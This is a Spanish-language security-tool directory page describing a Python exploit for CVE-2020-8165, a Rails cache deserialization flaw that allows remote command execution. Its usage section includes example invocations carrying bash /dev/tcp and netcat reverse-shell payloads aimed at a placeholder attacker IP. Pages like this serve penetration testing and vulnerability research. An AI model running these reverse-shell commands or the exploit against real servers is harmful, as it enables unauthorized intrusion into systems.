Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-8165 — Exploit en Python para CVE-2020-8165 dirigido a Rails MemCacheStore y RedisCacheStore. Permite ejecución remota de comandos mediante deserialización de objetos proporcionados por el usuario con interfaz basada en argparse. | Kitploit
Herramientas/GitHubGitHub/hybryx/cve-2020-8165
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubhybryx/cve-2020-8165

CVE-2020-8165

Exploit en Python para CVE-2020-8165 dirigido a Rails MemCacheStore y RedisCacheStore. Permite ejecución remota de comandos mediante deserialización de objetos proporcionados por el usuario con interfaz basada en argparse.

Ver Repositorio
43hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit en Python para CVE-2020-8165

Este es un código para explotar CVE-2020-8165 usando Python3. Este exploit funciona con rails < 5.2.4.3, rails < 6.0.3.1. El exploit permite a un atacante deserializar objetos proporcionados por el usuario en MemCacheStore y RedisCacheStore. Este código de exploit usa ArgParse para permitir al usuario explotar esta vulnerabilidad de forma muy sencilla.

Uso

Hay cinco argumentos para este exploit:

  • rHost - Dirección IP del host remoto objetivo
  • rPort - Número de puerto del host remoto objetivo en el que Rails está en ejecución
  • email - El correo electrónico utilizado para iniciar sesión en el servicio
  • password - La contraseña de la cuenta para iniciar sesión en el servicio
  • cmd - El comando a ejecutar, entre comillas para tener en cuenta los espacios

Ejemplos:

  • python3 exploit.py 10.10.10.X 8080 [email protected] password "bash -c 'bash -i >& /dev/tcp/10.10.X.X/8989 0>&1'"
  • python3 exploit.py 10.10.10.X 8080 [email protected] password "nc 10.10.X.X 8989"

Créditos principales

Detalles originales del CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165 Código de exploit de Pastebin que retoqué y al que añadí análisis de argumentos: https://pastebin.com/jpHpdBTk

Descargar herramienta